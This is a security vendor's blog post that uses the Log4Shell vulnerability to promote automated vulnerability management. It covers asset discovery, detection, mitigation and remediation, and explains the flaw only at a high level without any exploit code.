Mitigating the Next Log4shell: Automating Your Vulnerability Management Program

By Leonid Belkind

Jan 3, 2022

6 minutes

Torq

As CVE-2021-44228, a.k.a “Log4Shell” or Apache Log4j Remote Code Execution vulnerability continues to send shockwaves across the world of software, many security vendors and practitioners are rushing to provide recommendations on dealing with the crisis.

If you need immediate help mitigating the impact of Log4shell, we’re here for that. But the goal of this post is to look forward. This isn’t the first and won’t be the last high-impact vulnerability to be uncovered. So it’s worth preparing your organization for the next one, so that you can respond faster, mitigate and remediate sooner — and have fewer weekends like the last one.

What is all the fuss about?

In case you missed the high-level description of the problem among the vast amount of content being written about it, here is a quick TLDR:

Log4J is a very commonly used library for software packages implemented in Java programming language, utilized in such solutions as: Kafka, Solr, ElasticSearch and many more
The library contains a capability (arguably, violating the encapsulation principle of software engineering) allowing logs to contain dynamic “templates”, that cause the system to look up the data referred to in a template on an external service
After retrieving the information from the external service it can be treated as a Java object and can be executed (to resolve the “template”) inside the Log4j library
The template contains both the information about the external service to retrieve the data from and the data object to resolve, allowing the attacker to craft a “string” that will be written to the log file and cause the system to pull executable data from a malicious server, causing the Remote Code Execution to take place

You could say this is a classical case of a “road to hell being paved with good intentions”, at least in the minds of the designers of log4j.

Preparing for the next log4shell

Building a foundation for engineering and security operations to react quickly to new vulnerabilities requires two things.

First, having a comprehensive vulnerability management program defined and rolled out across your organization.
Second, automating and orchestrating the processes and tools that make up this program into a continuous process that allows for rapid detection, mitigation and remediation of newly-uncovered vulnerabilities.

Below, we’ll outline the five phases of successful vulnerability management programs, and discuss how automation during each phase results in reduced overall risk.

Discover (Assets)

The first step is identifying your assets that might contain vulnerable components. This process is fundamentally different between self-hosted bare-metal data-centers and virtualized public or private cloud environments. In the former case, periodic/continuous network scans are essential to discover newly deployed servers/services, whereas with the latter, using modern CSPM/CWPP platforms will provide the up-to-date information on the deployed assets.

Automating Discovery

Use automation to orchestrate regular scans or refreshes to ensure all newly-deployed assets are accounted for. Pulling data from both security and IT systems, normalizing, and comparing the two lists should be done, with any discrepancies flagged for human review.

Identify (Assets)

Knowing an asset exists is the first step, but it’s not enough. To ensure a swift and consistent response to new vulnerabilities, the following must be known about each asset:

Who is responsible for the asset (what team or individual should be contacted)
What is the role of the asset (application server, infrastructure / pipeline components, etc)
How the asset is managed (infrastructure as code, deployment from a ‘golden image, etc.)

Achieving clarity on the above points for all of the assets under your control puts you in a very strong position for ensuring a swift and consistent response.

Automating Identification

Guaranteeing this information is at your fingertips when you need it most requires adopting an automated approach to your asset identification and metadata enrichment. Regular audits of improperly “cataloged” assets, coupled with automated metadata collection and appending (either via a CMDB solution or directly tagged to the assets themselves, depending on environment) ensure that you’re prepared to detect and respond swiftly.

Detect (Vulnerabilities)

Detecting vulnerable assets is a role of a Vulnerabilities Scanner/CSPM/CWPP or similar solutions. It is important to understand that identifying a vulnerable asset can take place in two distinct scenarios:

When trying to roll out the asset into a production environment (if it is known to be vulnerable at that point)
When a new vulnerability is discovered or reported, finding which assets, that were considered to be safe when rolled out to production, are now vulnerable

Advanced vulnerability detection solutions can take multiple layers of your architecture into considering whether a vulnerable component is, actually, exploitable and prioritize the findings for handling accordingly.

Automating Detection

The role of automation differs depending on the scenario:

For case #1 (attempting to roll-out a vulnerable component to production), automated rules block deployment unless an explicit exception is made and approved, with a full audit log of the decision.
In case #2, automation should collect all instances of the vulnerability across known assets as soon as the detection happens and then launch the following phases (mitigation/remediation) with no delay.

Orchestrate Mitigation (if possible)

Mitigation is something that prevents the impact of the identified vulnerability or problem without the complex process of fixing the root cause.

While it is a practice that can be extremely useful as a stop-gap solution for a vulnerability that is endangering your services, it should be practiced with extreme caution, as it may mislead you into thinking that the problem was mitigated, whereas the reality is somewhat different.

Here are some examples, referring to mitigation suggestions for the particular log4j problem:

Removing the JndiLookup.class from the CLASSPATH at the vulnerable server to avoid the dangerous lookup behavior
Sounds like a good first step, at face value. If done properly, it will, at least, prevent the Remote Code Execution vulnerability from being exploited. If you are not closely familiar with the log4j library, you can’t say for sure how it will behave when it fails loading the class, but, at least, no one will be reaching out to the attacker’s servers.

Here are the caveats with this approach:

Let’s say you applied this to one or more servers; are you sure that there are no Auto Scaling Groups or PoD Orchestrators that would create additional virtual servers based on the vulnerable image in your cloud infrastructure in a matter of minutes? If so, the work you just did is useless.
What if the vulnerable application is running inside containers on one or more hosts? What if these containers are being dynamically launched and shut down by an orchestrator / operator? Approaching their image is a completely different matter.

Setting the system property log4j2.formatMsgNoLookup or an environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
Another very reasonable suggestion, that is also susceptible to the caveats listed above, in addition to many open questions, such as:

Should I restart the processes after making these changes?
How?
Would it impact the production service?

Configure WAF / Proxy to block JNDI Lookup templates in HTTP Requests / Headers
Another measure that won’t, probably, hurt much, but will provide only partial protection. Blocking HTTP Requests containing something that looks like an attempt to exploit the vulnerability is not a bad idea. The thing is, it will not stop a somewhat sophisticated attacker. Data (that will end up being written to log, invoking a lookup) could be sent encrypted, encoded or broken into parts (to be combined into something that causes an exploitation), bypassing this defense.

Automating Mitigation

While the above examples are specific to the current vulnerability, they highlight the challenges with applying the mitigation without having a full picture both of the security and of the infrastructure aspects.

Automation of mitigations should be handled with care to avoid unintended consequences. Whether updating firewall or CDN rules, or updating configuration of impacted assets, a human-in-the loop approach ensures that there’s vetting, visibility, and auditing for all actions taken, so unintended consequences can be easily addressed. Tying automated mitigation processes together with bot capabilities helps speed the human aspects of the processes, while ensuring this data is collected.

Orchestrate Remediation

This is, actually, the main bulk of activity when it comes to managing vulnerabilities. Remediation requires involving the owners of the servers/services, guiding them through updating the vulnerable applications to resolve the vulnerabilities and deploying these to production. In a significant corporate environment, this is a multi-stage process involving multiple role players across different teams.

Relying on ticketing systems to bind all the activities and the actors together usually leads to a non-uniform response and a lot of manual work involved in making sure that everything has been handled properly.

Automating Remediation

Ensuring that the correct remediation steps are identified, the right owners involved, the correct timelines set, and then communicating across the multiple teams and stakeholders is no easy matter. Automating ticket creation, information sharing, approvals helps accelerate getting the work done, while automating verification and ticket updates after remediations are applied helps teams confidently ensure that all instances of a vulnerability have been patched.

Summary

Adoption of Continuous Vulnerability Management is the only way to ensure that your organization is ready for the next critical vulnerability to be discovered and announced. In the modern world of software engineering, re-use of open source software and software services makes the discovery of wide-impacting vulnerabilities a recurring reality.

The only way to be ready for efficient handling of vulnerabilities is to lay down a foundation for automated Vulnerability Management. The above article explains where such a foundation integrates into the existing processes and infrastructure.

Torq is a no-code automation and orchestration platform for security and operations. It is used today by world’s leading organizations to automate security operations, including continuous vulnerability management processes according to the paradigm presented above.

Interested in trying continuous vulnerability management capabilities in Torq? Get started today.